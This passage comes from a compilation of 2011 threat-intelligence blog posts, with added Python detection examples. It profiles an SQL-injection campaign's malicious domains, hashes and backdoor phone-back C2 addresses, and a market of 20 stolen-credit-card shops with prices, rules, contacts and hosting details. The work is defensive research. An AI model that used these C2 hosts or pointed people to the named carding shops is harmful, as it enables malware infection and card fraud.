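def scan_rows(rows, first_party=FIRST_PARTY):
    """Map row id -> injected hosts for every row that carries one."""
    findings = {}
    for row_id, text in rows:
        hosts = injected_hosts(text, first_party)
        if hosts:
            findings[row_id] = hosts
    return findings


def strip_injected(text, first_party=FIRST_PARTY):
    """Remove whole <script>...</script> elements whose src is not first-party."""
    def repl(match):
        return "" if injected_hosts(match.group(0), first_party) else match.group(0)
    return SCRIPT_EL_RE.sub(repl, text)


if __name__ == "__main__":
    for row_id, hosts in scan_rows(SAMPLE_ROWS).items():
        print(f"row {row_id}: injected script from {', '.join(hosts)}")
        print("  cleaned:", strip_injected(dict(SAMPLE_ROWS)[row_id]))
```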

SQL injected domains - thanks to Dasient's Tufan Demir for the ping:

nbnjkl.com/urchin.js - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com

jjghui.com/urchin.js - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com

bookzula.com/ur.php - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com

bookgusa.com/ur.php - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com

dfrgcc.com/ur.php - Email: jamesnorthone@hotmailbox.com

statsl.com/ur.php - 111.22.111.111 - Email: jamesnorthone@hotmailbox.com

milapop.com/ur.php - Email: jamesnorthone@hotmailbox.com

jhgukn.com/ur.php - Email: jamesnorthone@hotmailbox.com

vovmml.com/ur.php - Email: jamesnorthone@hotmailbox.com

bookvivi.com/ur.php - Email: jamesnorthone@hotmailbox.com

Responding to 146.185.248.3 is also file-dl.com; bookfula.com and bookvila.com - Email: jamesnorthone@hotmailbox.com
Detection rate for urchin.js:

urchin.js - [7]Trojan.JS.Redirector - 17/42 (40.5 %)

MD5: 4387f9be5af4087d21c4b44b969a870f
SHA1: 8a47842ccf6d642043ee8db99d0530336eef6b99
SHA256: 975e62fe1d9415b9fa06e8f826f776ef851bd030c2c897bc3fbee207519f8351
The redirections take place as follows:

• bookzula.com/ur.php -> www3.topasarmy.in/?w4q593n= - Email: bill.swinson@yahoo.com -> firstrtscaner.rr.nu

• nbnjkl.com/urchin.js -> power-wfchecker.in/?ldiia916= - Email: bill.swinson@yahoo.com

bill.swinson@yahoo.com has also been used to register a long list of scareware-serving domains.



For the time being, the campaign is redirecting to a fake YouTube page enticing users into downloading a bogus Adobe Flash player in order to view the video.

Detection rate for the bogus Adobe Flash player:

scandisk.exe - [8]Backdoor:Win32/Simda.A - 8/43 (18.6 %)

MD5: fb4c93935346d2d8605598535528506e
SHA1: 0ff7ccd785c0582e33c22f9b21156929ba7abaeb
SHA256: b204586cbac1606637361dd788b691f342cb1c582d10690209a989b040dab632

Upon execution the sample phones back to:

209.212.147.141/chrome/report.html

98.142.243.64/chrome/report.html

update.19runsl0q3.com - 65.98.83.115

The same phone-back locations have been used in a variety of related malware - thanks to Kaspersky's David Jacoby for the ping. For instance, [9]this malware sample, which also phones back to the same URLs, actively modifies the HOSTS file, pinning Google, Bing and Yahoo search hostnames (along with several analytics and advertising hostnames) to fixed IP addresses.

See related post: [10]Sampling Malicious Activity Inside Cybercrime-Friendly Search Engines



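HOSTS tampering of this kind can be caught without a signature for the specific sample. As an added example that is not part of the original post, the following Python parses a hosts file, flags watched search-engine and analytics hostnames pinned to routable IPs, and flags public IPs that collect many hostnames; the hosts content is constructed and its IPs come from documentation ranges, not from the campaign.

```python
import ipaddress
from collections import defaultdict

# Hostnames of the kind the sample above pinned in HOSTS; a defender keeps a
# watch list like this for names that must never be statically mapped.
WATCHED_SUFFIXES = (
    "google.com", "google.co.uk", "google.de", "google.fr", "google-analytics.com",
    "bing.com", "yahoo.com", "doubleclick.net", "statcounter.com",
)

# Address space a hosts file may legitimately point at (loopback is handled
# separately, since 127.0.0.1 entries are blackholes rather than redirects).
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7", "fe80::/10")]

# Constructed hosts(5) content: two stock lines, one benign intranet entry, then
# entries modelled on the tampering described above. The IPs are RFC 5737
# documentation addresses, not the campaign's.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             localhost ip6-localhost
192.168.1.20    intranet.example.test   # constructed, benign
203.0.113.99    www.google.com
203.0.113.103   google.com
198.51.100.101  www.google-analytics.com ad-emea.doubleclick.net www.statcounter.com
203.0.113.97    www.bing.com
198.51.100.249  search.yahoo.com www.search.yahoo.com
"""


def parse_hosts(text):
    """Return (ip_address, hostname) pairs; comments and blank lines are ignored."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed line: not a hosts entry
        for host in fields[1:]:
            entries.append((ip, host.lower().rstrip(".")))
    return entries


def is_watched(host):
    return any(host == s or host.endswith("." + s) for s in WATCHED_SUFFIXES)


def is_local(ip):
    return ip.is_loopback or any(ip in net for net in LOCAL_NETS)


def find_hijacks(text, cluster_threshold=3):
    """Two findings: watched names mapped to a non-loopback IP, and routable IPs
    that collect many hostnames (the mass-redirect shape seen in the sample)."""
    entries = parse_hosts(text)
    pinned = [(host, str(ip)) for ip, host in entries
              if is_watched(host) and not ip.is_loopback]
    by_ip = defaultdict(set)
    for ip, host in entries:
        if not is_local(ip):
            by_ip[str(ip)].add(host)
    crowded = {ip: sorted(hosts) for ip, hosts in by_ip.items()
               if len(hosts) >= cluster_threshold}
    return pinned, crowded


if __name__ == "__main__":
    pinned, crowded = find_hijacks(SAMPLE_HOSTS)
    for host, ip in pinned:
        print(f"pinned: {host} -> {ip}")
    for ip, hosts in crowded.items():
        print(f"crowded: {ip} serves {len(hosts)} names: {', '.join(hosts)}")
```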

[11]The Lizamoon mass SQL injection connection

The same email used to register the SQL injected domains, jamesnorthone@hotmailbox.com, has been used to register the Lizamoon mass SQL injection attack domains extensively profiled here - "[12]Dissecting the Massive SQL Injection Attack Serving Scareware".

Related posts:

• [13]SQL Injection Through Search Engines Reconnaissance

• [14]Massive SQL Injections Through Search Engine's Reconnaissance - Part Two

• [15]Massive SQL Injection Attacks - the Chinese Way

• [16]Cybercriminals SQL Inject Cybercrime-friendly Proxies Service

• [17]GoDaddy's Mass WordPress Blogs Compromise Serving Scareware

• [18]Dissecting the WordPress Blogs Compromise at Network Solutions

• [19]Yet Another Massive SQL Injection Spotted in the Wild

• [20]Smells Like a Copycat SQL Injection In the Wild

• [21]Fast-Fluxing SQL Injection Attacks

• [22]Obfuscating Fast-fluxed SQL Injected Domains

This post has been reproduced from [23]Dancho Danchev's blog. Follow him [24]on Twitter.

1. http://www.zdnet.com/blog/security/over-a-million-web-sites-affected-in-mass-sql-injection-attack/9662

2. http://i.zdnet.com/blogs/mass_sql_injection_attack.png

3. http://ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines.html

4. http://ddanchev.blogspot.com/2009/04/massive-sql-injections-through-search.html

5. http://blog.armorize.com/2011/10/httpjjghuicomurchinjs-mass-infection.html

6. http://ddanchev.blogspot.com/2011/03/dissecting-massive-sql-injection-attack.html

7. http://www.virustotal.com/file-scan/report.html?id=975e62fe1d9415b9fa06e8f826f776ef851bd030c2c897bc3fbee207519f8351-1318924415

8. http://www.virustotal.com/file-scan/report.html?id=b204586cbac1606637361dd788b691f342cb1c582d10690209a989b040dab632-1319047251

9. http://pastebin.com/EEHVb6ux

10. http://ddanchev.blogspot.com/2010/07/sampling-malicious-activity-inside.html

12. http://ddanchev.blogspot.com/2011/03/dissecting-

13. http://ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines.html

14. http://ddanchev.blogspot.com/2009/04/massive-sql-injections-through-search.html

15. http://ddanchev.blogspot.com/2008/10/massive-sql-injection-attacks-chinese.html

16. http://ddanchev.blogspot.com/2010/07/cybercriminals-sql-inject-cybercrime.html

17. http://ddanchev.blogspot.com/2010/04/godaddys-mass-wordpress-blogs.html

18. http://ddanchev.blogspot.com/2010/04/dissecting-wordpress-blogs-compromise.html

19. http://ddanchev.blogspot.com/2008/05/yet-another-massive-sql-injection.html

20. http://ddanchev.blogspot.com/2008/07/smells-like-
Exposing the Market for Stolen Credit Cards Data (2011-10-31 02:07)

What's the [1]average price for a stolen credit card? How are [2]prices shaped within the cybercrime ecosystem? Can we talk about [3]price discrimination within the underground marketplace? Just how easy is it to purchase stolen credit cards, known as dumps or full dumps, nowadays?

In this intelligence brief, I will expose the market for stolen credit card data by profiling 20 currently active and responding gateways for the processing of fraudulently obtained financial data.

Key summary points:

• Tens of thousands of stolen credit cards, a.k.a. dumps and full dumps, offered for sale in a DIY market fashion

• The majority of the carding sites are hosted in Ukraine and the Netherlands

• Liberty Reserve is the payment option of choice for the majority of the portals

• Four domains are using Yahoo accounts and one is using a Live.com account for domain registration

• Four of the domains are using identical name servers

• Each DIY gateway for processing of fraudulently obtained financial data has a built-in credit card checker or offers links to external sites performing the service

• Several of the fraudulent gateways offer proxies-as-a-service, allowing cybercriminals to hide their real IPs by using malware-infected hosts as stepping stones

The dynamics of the cybercrime ecosystem closely resemble those of a legitimate marketplace. From sellers and buyers to bargain hunters, escrow agents, resellers and vendors specializing in a specific market segment, all the market participants remain active throughout the entire purchasing process. With ZeuS and SpyEye crimeware infections proliferating, it shouldn't be surprising that the average price for a stolen credit card is decreasing.

With massive dumps of credit card details in the hands of cybercriminals, obtained through [4]ATM skimming and crimeware botnets, the marketplace is getting over-crowded with trusted propositions for stolen credit card details.

What used to be a market where over-the-counter trade was the primary growth factor is today a highly standardized marketplace with DIY online interfaces, allowing anyone to join and purchase stolen credit card details. Naturally, the vendors of dumps and full dumps are vertically integrating within the marketplace and are offering additional services such as checkers for credit card validity, and proxies-as-a-service - [5]compromised, malware-infected hosts - allowing a potential cybercriminal the opportunity to hide their IP while using the recently purchased credit card data.

How are prices shaped within this new and standardized market model offering commodity goods such as stolen credit cards, and is price discrimination for the stolen credit cards even feasible? The vendors currently offer fixed prices for the majority of credit cards, with slight increases in the price of a stolen credit card if the card is Premium. Bulk orders are naturally also considered a growth factor for the DIY interfaces, with slight discounts being offered for bulk orders.

As far as [6]price discrimination is concerned, the concept is long gone, and has become the victim of this ongoing standardization of the market. The same goes for penetration pricing, as the vendors of stolen credit card details now enjoy better underground market transparency into the fraudulent propositions of competing portals, helping them to set prices more easily, without the need to lower the price in order to enter the market segment.

Let's profile the 20 gateways for processing of fraudulently obtained financial data.

Responding IPs, registered emails, name servers, ASNs, associated ICQ numbers and geolocation of the hosting IP are as follows:

ccmall.cc - 213.5.70.34 - Name server: TR1.ONLINESHOP.SU - Email: gwylhcfktm@whoisservices.cn - AS49544, INTERACTIVE3D-AS - HOSTED IN THE NETHERLANDS

track2.name - 91.213.175.121 - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE

trackstore.su - 46.21.148.26 - Email: roger.sroy@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED IN THE NETHERLANDS

magic-numbers.cc - 91.213.175.89; 91.223.77.35 - Name server: NS1.1000DNS.NET - Email: contact@privacyprotect.org - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE

allfresh.us - 46.21.144.115 - Name server: YNS1.YAHOO.COM - Email: keikomiyahara@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED IN THE NETHERLANDS

freshstock.biz - 38.97.225.166; 69.175.73.184 - Name server: NS1.PIPEDNS.COM - Email: ghmbfvntxs@whoisprivacyprotect.com - AS32475, SINGLEHOP, Inc. - HOSTED IN THE UNITED STATES

bulba.cc - 91.223.77.254 - Name server: NS1.NAMESELF.COM - Email: bulbacc@yahoo.com - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE

approven.su - 91.229.248.20 - Name server: dns1.naunet.ru - Email: yurtan20@el.ru - HOSTED IN UKRAINE

cv2shop.com - 72.20.12.205 - Name server: DNS1.NAME-SERVICES.COM - Email: wnfxgjdg@whoisprivacyprotect.com - AS25761, STAMINUS-COMM - HOSTED IN THE UNITED STATES

vzone.tc - 49.212.25.242 - Name server: dns1.yandex.ru - Email: adamsnames@rrpproxy.net - AS9371, SAKURA-C SAKURA Internet - HOSTED IN JAPAN

ccStore.ru - 91.220.101.200 - Name server: ns1.1000dns.net - Email: ccstoreru@yahoo.com - AS49704 - HOSTED IN THE NETHERLANDS

dumps.cc redirects to privateservices.ws and trackservices.ws - 124.217.247.59 - Name server: NS1.IPSTATES.NET - Email: dumps.cc@domainsproxy.net - AS45839, PIRADIUS-AS PIRADIUS NET - HOSTED IN MALAYSIA

privateservices.ws - 217.23.9.92 - Name server: ns1.servicedns.nl - AS49981, WorldStream AS Maasdijk - HOSTED IN THE NETHERLANDS

perfect-numbers.cc - 91.220.101.75 - Name server: NS1.1000DNS.NET - AS49704, ADDOS-AS FOP Litvinenko Sergey Nikolaevich; ICQ: 605099359 - HOSTED IN THE NETHERLANDS

mega4u.biz - 178.162.174.71 - Name server: NS1.FREEDNS.WS - Email: persiks@online.ua - AS28753, LEASEWEB-DE - HOSTED IN GERMANY

accessltd.ru - 91.213.175.167 - Name server: ns14.zoneedit.com - Email: admin@accessltd.ru - AS6849, UKRTELNET JSC UKRTELECOM, 18, Shevchenko blvd. Kiev, Ukraine - HOSTED IN UKRAINE

pwnshop.cc - 77.79.13.209 - Name server: NS1.AFRAID.ORG - AS16125, DC-AS UAB - HOSTED IN LITHUANIA

bestdumps.su - 91.213.175.57 - Name server: ns1.1000dns.net - Email: bestdumpssu@live.com; ICQ: 619429330 - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE

mycc.su - 188.93.17.180 - Name server: ns1.deltahost.com.ua - Email: admin@mycc.su - AS49505, SELECTEL Ltd. - HOSTED IN RUSSIA

bestdumps.biz - 195.3.145.87 - Name server: NS1.BESTDUMPS.BIZ - Email: admin@bestdumps.biz - AS50244 - HOSTED IN LATVIA; Associated email: bdsupport@jabber.org; Associated ICQ: 655584

dumpshop.bz - 217.23.9.93 - Name server: ns1.servicedns.nl - Email: contact@privacyprotect.org; AS49981, WorldStream; HOSTED IN THE NETHERLANDS

cardshop.bz - 217.23.9.67 - Name server: ns1.servicedns.nl - Email: contact@privacyprotect.org; AS49981, WorldStream; HOSTED IN THE NETHERLANDS
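The reconnaissance records above can be pivoted mechanically on shared name servers, ASNs, registrant mail providers and neighbouring IPs, which is how the key summary points (four gateways on one name server, four Yahoo and one Live.com registrant) are reached. As an added example that is not part of the original post, the following Python parses a nine-record subset of the listing and reproduces those groupings; the record-parsing rules are this example's own.

```python
import re
from collections import defaultdict

# Patterns for the loosely structured "domain - IP - Name server: X - Email: Y -
# ASn, org - HOSTED IN country" records used in this post (this example's own).
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
NS_RE = re.compile(r"Name server:?\s*-?\s*([A-Za-z0-9.-]+)", re.I)
EMAIL_RE = re.compile(r"Email:?\s*-?\s*([\w.+-]+@[\w-]+(?:\.[\w-]+)+)", re.I)
ASN_RE = re.compile(r"\bAS\s?(\d+)\b")
HOST_RE = re.compile(r"HOSTED IN ([A-Z ]+?)\s*(?:[;,]|$)")

# Sample input: nine of the gateway records from the listing above, one per
# line (a constructed subset; the full listing has 20 gateways).
SAMPLE = """\
trackstore.su - 46.21.148.26 - Email: roger.sroy@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED IN THE NETHERLANDS
magic-numbers.cc - 91.213.175.89; 91.223.77.35 - Name server: NS1.1000DNS.NET - Email: contact@privacyprotect.org - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE
allfresh.us - 46.21.144.115 - Name server: YNS1.YAHOO.COM - Email: keikomiyahara@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED IN THE NETHERLANDS
bulba.cc - 91.223.77.254 - Name server: NS1.NAMESELF.COM - Email: bulbacc@yahoo.com - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE
ccStore.ru - 91.220.101.200 - Name server: ns1.1000dns.net - Email: ccstoreru@yahoo.com - AS49704 - HOSTED IN THE NETHERLANDS
perfect-numbers.cc - 91.220.101.75 - Name server: NS1.1000DNS.NET - AS49704, ADDOS-AS FOP Litvinenko Sergey Nikolaevich; ICQ: 605099359 - HOSTED IN THE NETHERLANDS
bestdumps.su - 91.213.175.57 - Name server: ns1.1000dns.net - Email: bestdumpssu@live.com; ICQ: 619429330 - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE
dumpshop.bz - 217.23.9.93 - Name server: ns1.servicedns.nl - Email: contact@privacyprotect.org; AS49981, WorldStream; HOSTED IN THE NETHERLANDS
cardshop.bz - 217.23.9.67 - Name server: ns1.servicedns.nl - Email: contact@privacyprotect.org; AS49981, WorldStream; HOSTED IN THE NETHERLANDS
"""


def parse_record(line):
    """Turn one free-text record into a dict of pivotable attributes."""
    ns, em, asn, host = (rx.search(line) for rx in (NS_RE, EMAIL_RE, ASN_RE, HOST_RE))
    return {
        "domain": line.split(" - ", 1)[0].strip().lower(),
        "ips": IP_RE.findall(line),
        "name_server": ns.group(1).lower() if ns else None,
        "email": em.group(1).lower() if em else None,
        "asn": "AS" + asn.group(1) if asn else None,
        "country": host.group(1).strip() if host else None,
    }


def parse_all(text):
    return [parse_record(line) for line in text.splitlines() if line.strip()]


def pivot(records, field):
    """Map each value of `field` to the set of domains sharing it (2+ only)."""
    groups = defaultdict(set)
    for rec in records:
        if rec[field]:
            groups[rec[field]].add(rec["domain"])
    return {key: doms for key, doms in groups.items() if len(doms) > 1}


def email_providers(records):
    """Domains grouped by the mail provider of the registrant address."""
    providers = defaultdict(set)
    for rec in records:
        if rec["email"]:
            providers[rec["email"].split("@", 1)[1]].add(rec["domain"])
    return dict(providers)


def shared_class_c(records):
    """Domains whose hosting IPs fall in the same /24, a cheap co-hosting hint."""
    groups = defaultdict(set)
    for rec in records:
        for ip in rec["ips"]:
            groups[ip.rsplit(".", 1)[0] + ".0/24"].add(rec["domain"])
    return {key: doms for key, doms in groups.items() if len(doms) > 1}


if __name__ == "__main__":
    recs = parse_all(SAMPLE)
    for label, groups in (("name server", pivot(recs, "name_server")),
                          ("ASN", pivot(recs, "asn")),
                          ("registrant mail provider", email_providers(recs)),
                          ("/24", shared_class_c(recs))):
        print(f"== shared {label} ==")
        for key, doms in sorted(groups.items()):
            print(f"{key}: {', '.join(sorted(doms))}")
```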

Let's now take an inside view into each of the above-profiled gateways.

accessltd.ru

Accessltd.ru is currently offering an inventory of 39328 U.S.-based stolen credit card details for just $2.10 each, followed by another inventory of 342 U.K.-based credit cards for $9 each, 108 Japanese credit cards for $8 each, another dump of 293 Canadian credit cards for $7 each, and 198 Australian credit cards for $8 each.

According to the service - "We accept Liberty Reserve only. Refund on your wallets is not possible."

Moreover, here's how the service operates based on the Service Rules:

"To check the card is integrated into the platform checker CCChecker, currently the best checker, not only in our opinion. Replacement cards are only based on the result of this checker. Check Card is available immediately after order payment, in the section My Orders. To check, click "Check". Cards checking in for a few seconds. Button "Check" - available within 20 minutes after purchase. Check Card - a paid service, which costs $0.3, if the card is not valid - the cost of cards back to your account automatically.

Replacement card can only be made in the automatic mode. If checker don't working, for replace need screens your checker in the Support section with a description of the problem. These tickets will only be considered if they contain the results of your test, not a "paid for Skype, did not work, replace". We do not care where and how you use the material, loading support extra information is needed. We will check the card manually, and if any parameter is not correct to make you refund. Sorting:

Our shop is available sorted by the following parameters:

1. BIN (Multiple)

2. State (Multiple)

3. City (Multiple)

4. Zip (Multiple)"

Domain reconnaissance

accessltd.ru - 91.213.175.167 - Name server: ns14.zoneedit.com - Email: admin@accessltd.ru - AS6849, UKRTELNET JSC UKRTELECOM, 18, Shevchenko blvd. Kiev, Ukraine - HOSTED IN UKRAINE

AllFresh.us

AllFresh.us is yet another DIY shop for purchasing stolen credit card details, all fresh as the name says.

On 2011/08/04 the service issued updates for "updated US Amex, Discover fresh and good", followed by another update on the next day, this time advertising "updated more cvv France new and good today."

The price for a stolen card number is static and is $6 per credit card.

Domain reconnaissance

allfresh.us - 46.21.144.115 - Name server: YNS1.YAHOO.COM - Email: keikomiyahara@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED IN THE NETHERLANDS

Approven.su

Approven.su is a relatively more advanced DIY shop for purchasing stolen credit card details, due to its advanced search options, which give cybercriminals an easier way to search the dumps/full dumps of stolen credit card details.

The most recent announcement at Approven.su says "Sumer Jam: 8 new bases - Georgia 2, California3, Pennsylvania3, Puerto Rico, California4, Texas4, Virginia, California5".

The price for a stolen credit card is $10, with Platinum cards going for $15.

Domain reconnaissance

approven.su - 91.229.248.20 - Name server: dns1.naunet.ru - Email: yurtan20@el.ru - HOSTED IN UKRAINE


BestDumps.biz

BestDumps.biz doesn't allow newly registered visitors the opportunity to search across its database of stolen credit card details, unless they pay $50 using Liberty Reserve.

Domain reconnaissance

bestdumps.biz - 195.3.145.87 - Name server: NS1.BESTDUMPS.BIZ - Email: admin@bestdumps.biz - AS50244 - HOSTED IN LATVIA; Associated email: bdsupport@jabber.org; Associated ICQ: 655584

Bulba.cc

Bulba.cc offers a Checker for stolen credit cards.

The most recent announcement is "UPDATE ADDED 1000 MEXICO RARE! FRESH! 95 % VALID!!! Hurry up to load the account".

The service advertises itself as follows:

"Hello my name is Bulba. I am official reseller of TRACK2.NAME service. Bulba.cc opened because track2.name closed registration and don't accept new customers. We don't have any specific rules. Our only rule is "we don't replace bad dumps". That means we don't replace them at all and we don't have replacement policy. Don't ask about it in any case!

We accept Liberty Reserve, WU, MG, Bank Transfer (NEW) without any fees. Minimum for payment by LR - 10 $, WU, MG - 500 $, Bank Transfer - 500 $. Also we give 10 % bonus of money to all purchases.

Our bases: SALES - track2, 50 % valid, alot dumps! Very cheap $7 per one! DATABASE9 - TRACK1+TRACK2 (90 %) + TRACK2 (10 %) only! 80 % valid, FRESH. NEW DATABASE, TRACK 2 only, 95 % valid, FRESH! NEW!"

Domain reconnaissance

bulba.cc - 91.223.77.254 - Name server: NS1.NAMESELF.COM - Email: bulbacc@yahoo.com - AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE

_CardShop.bz 


CardShop.bz is yet another DIY interface for purchasing 
stolen credit cards data (dumps/full dumps). The general 
rules of the site are as follows: 

2.1.1) All calculations on a site and its services - automatic 

2.1.2) Minimum funding amount on a site 10 $ that equals 
to 50 credits 

871 

2.1.3) Period of validity of credits is 1 month (under the 
additional oral agreement term can be increased). In a case 
if you had not time to spend all credits, it is possible to 
make fund of your account and credits will automatically be 
restored 

2.1.4) Refund for not used credits - IS NOT POSSIBLE 

In order to avoid conflict situations, please check 
information that you need before funding account 

The Rules of service ONLINE sale CC/DUMPS reads: 

"2.2) Rules of service ONLINE sale CC/DUMPS 

2.2.1) Return of credits for purchased CC/Dumps which have 
been checked before purchase and have status VALID - 

IS NOT POSSIBLE 

2.2.1) Return of credits for purchased CC/Dumps which have 
been checked in 1 hour after purchase through the link 

'Check' and having status VALID - IS NOT POSSIBLE 

2.2.2) Return of credits for purchased invalid CC/Dumps 
(DECLINE/HOLD CALL/PICKUP) which are not checked before 



purchase, is possible only within 24 hours after the order. 
After 24 hours any claims on return of credits are not 
accepted 

2.2.3) You will not be charged for invalid CC/Dumps if you 
checked it instant or in 1 hour and credits will be refunded 
automatically. You will be charged only for CC/Dumps 
checking even if CC/Dumps is invalid 

2.2.4) We do not guarantee limits and amounts on 
CC/Dumps 

2.3) Rules of service ONLINE Check CC/Dumps 

2.3.1) Status Valid, means that at the moment of check 
CC/Dump was Approved 

2.3.2) Status Declined, means that at the moment of check 
CC/Dump was Decline/Pickup/Hold Call 

2.3.3) Claims on checked DUMP/CC are not accepted. 

2.7) Rules of other services on site CardShop will be added 
in this agreement later 

3) Prices and Tariffs 

3.1.1) 1 credit is accepted to a unit of account on site 
CardShop. Initially 1 credit = 1 $. The price for 1 credit can 
change according to tariffs for funding. Tariffs could be 
found in Tariff section at site 

3.1.2) Administration CardShop reserves the right to itself at 
any moment to change tariffs. You agree periodically check 
tariffs on site CardShop to learn about possible changes in 
them" 

The site is currently offering 33903 U.S based stolen credit 
cards for sale. The web site is also offering Proxies for sale - 
compromised malware infected hosts - where the price is 0.3 
$ per proxy. Next to the inventory of stolen credit cards and 
the proxy service, the web site is also offering batch 
checking for the validity of the stolen credit cards, and is 
also performing SSN/MMN Lookup services, with the ability 
to Lookup MMN in California state. 
Domain reconnaissance 

cardshop.bz - 217.23.9.67 - Name server: ns1.servicedns.nl - 
Email: contact@privacyprotect.org; AS49981, WorldStream; 
HOSTED IN THE NETHERLANDS 

_CcMall.cc 

CcMall.cc is associated with the following ICQ number 
777605, where potential buyers would have to connect with 
the seller in order to be offered the ability to register in the 
site. "For private limited registration only into the new 
shop" is currently displayed on CcMall.cc's web site. 


Domain reconnaissance 

ccmall.cc - 213.5.70.34 - Name server: TR1.ONLINESHOP.SU - 
Email: gwylhcfktm@whoisservices.cn - AS49544, 
INTERACTIVE3D-AS - HOSTED IN THE NETHERLANDS; Name 
server: tr1.onlineshop.su - Email: exchangers@msn.com; 
context.cx is also registered using exchangers@msn.com. 

_ccStore.ru 

ccStore.ru is associated with the following ICQ - 20606, and 
requires that a valid email address is supplied in order to 
activate the access to yet another interface for selling and 
reselling fraudulently obtained financial data. 
Domain reconnaissance 

ccStore.ru - 91.220.101.200 - Name server: 
ns1.1000dns.net - Email: ccstoreru@yahoo.com - AS49704 - 
HOSTED IN THE NETHERLANDS 

_Cv2Shop.com 

Cv2Shop.com has an inventory of 734 U.S based stolen 
credit cards for the price of Discovery - $2.2 per piece; 
Amex for $2; Mastercard for $2; Visa for $1.7 per piece. The 
fraudulent interface is also offering 80 Canadian stolen 
credit cards for the price of $7 per piece for Discovery and 
Amex, and for $6 for Mastercard and $5 for Visa. 

Domain reconnaissance 

cv2shop.com - 72.20.12.205 - Name server: 
DNS1.NAME-SERVICES.COM - Email: 
wnfxgjdg@whoisprivacyprotect.com - AS25761, STAMINUS-COMM 
- HOSTED IN THE UNITED STATES 

_FreshStock.biz 

FreshStock.biz is associated with the following ICQ - 
607373112, where users have to initiate the contact in order 
to obtain access to the DIY shop for stolen credit cards. 

Domain reconnaissance 

freshstock.biz - 38.97.225.166; 69.175.73.184 - Name 
server: NS1.PIPEDNS.COM - Email: 
ghmbfvntxs@whoisprivacyprotect.com - AS32475, SINGLEHOP, 
Inc. - HOSTED IN THE UNITED STATES 

_Magic-Numbers.cc 

Magic-Numbers.cc is associated with the following ICQ - 
333277 and Jabber: elche@jabber.org, where users wanting 
bulk orders have to contact the cybercriminals offering the 
DIY interface for stolen credit card numbers. 

The web site is currently offering 24642 U.S based stolen 
credit cards, followed by another 1545 Israeli based 
credit cards, with the total number of dumps currently being 
offered at 43,507. The most recent advertisement reads: 
"Australia base, ultra virgin fresh base - track2 available. 
Approval rate 85 %" 

Domain reconnaissance 

magic-numbers.cc - 91.213.175.89; 91.223.77.35 - Name 
server: NS1.1000DNS.NET - Email: contact@privacyprotect.org 
- AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE 

_Mega4u.biz 

mega4u.biz is currently closed for free registration. 

Domain reconnaissance 

mega4u.biz - 178.162.174.71 - Name server: 
NS1.FREEDNS.WS - Email: persiks@online.ua - AS28753, 
LEASEWEB-DE - HOSTED IN GERMANY 

_MyCc.su 

MyCc.su is associated with the following ICQ - 40040000 
and, next to offering stolen credit cards for sale, is also 
soliciting security vulnerabilities - "Found a bug? We will 
pay!". The latest update from September 29 says that 1500 
EU based stolen credit cards have been added, followed by 
another update from the same date, this time with 
300 French based stolen credit cards added. 

The price of the stolen credit cards varies between $2 and 
$5. 

Domain reconnaissance 

mycc.su - 188.93.17.180 - Name server: 
ns1.deltahost.com.ua - Email: admin@mycc.su - AS49505, 
SELECTEL Ltd. - HOSTED IN RUSSIA 

_Perfect-Numbers.cc 

Perfect-Numbers.cc is yet another DIY interface for 
purchasing stolen credit cards. It's associated with the 
following ICQ - 605099359. Users are able to search within 
the interface only after they have refilled their balance 
using Liberty Reserve as a means of payment. 

Domain reconnaissance 

perfect-numbers.cc - 91.220.101.75 - Name server: 
NS1.1000DNS.NET - AS49704, ADD05-AS FOP Litvinenko 
Sergey Nikolaevich; ICQ: 605099359 - HOSTED IN THE 
NETHERLANDS 

_PrivateServices.ws 

privateservices.ws currently has a database of 634 U.K 
based stolen credit cards, and another 293 French based 
stolen credit cards. 

Domain reconnaissance 

privateservices.ws - 217.23.9.92 - Name server: 
ns1.servicedns.nl - AS49981, WorldStream AS Maasdijk - 
HOSTED IN THE NETHERLANDS 

_pwnshop.cc 

pwnshop.cc is yet another DIY interface for selling stolen 
credit card numbers. The web site is currently returning the 
following message: "You can obtain registration code only 
from exist clients. Please be aware of scam - registration 
code is free for exist clients, so if you pay for it - ask for 
refund." 

Domain reconnaissance 

pwnshop.cc - 77.79.13.209 - Name server: 
NS1.AFRAID.ORG - AS16125, DC-AS UAB - HOSTED IN 
LITHUANIA 

_TrackStore.su 

trackstore.su is offering existing clients the option to refer 
additional customers for the price of $20 each. The web site 
is currently offering 1648 U.S based stolen credit cards, 
exclusively from the Suntrust Bank, for the price of $10 
for each stolen credit card. 

Domain reconnaissance 

trackstore.su - 46.21.148.26 - Email: 
roger.sroy@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED 
IN THE NETHERLANDS 

_Track2.name 

track2.name is offering stolen credit card numbers for the 
price of $20 for each stolen credit card. 
Domain reconnaissance 

track2.name - 91.213.175.121 - AS6849, UKRTELNET JSC 
UKRTELECOM - HOSTED IN UKRAINE 

_vzone.tc 

vzone.tc is yet another DIY shop for stolen credit card 
numbers. The current announcement reads: "Dear users, 
after you buy cards, to view proper information, please click 
download all cards or download selected card from My 
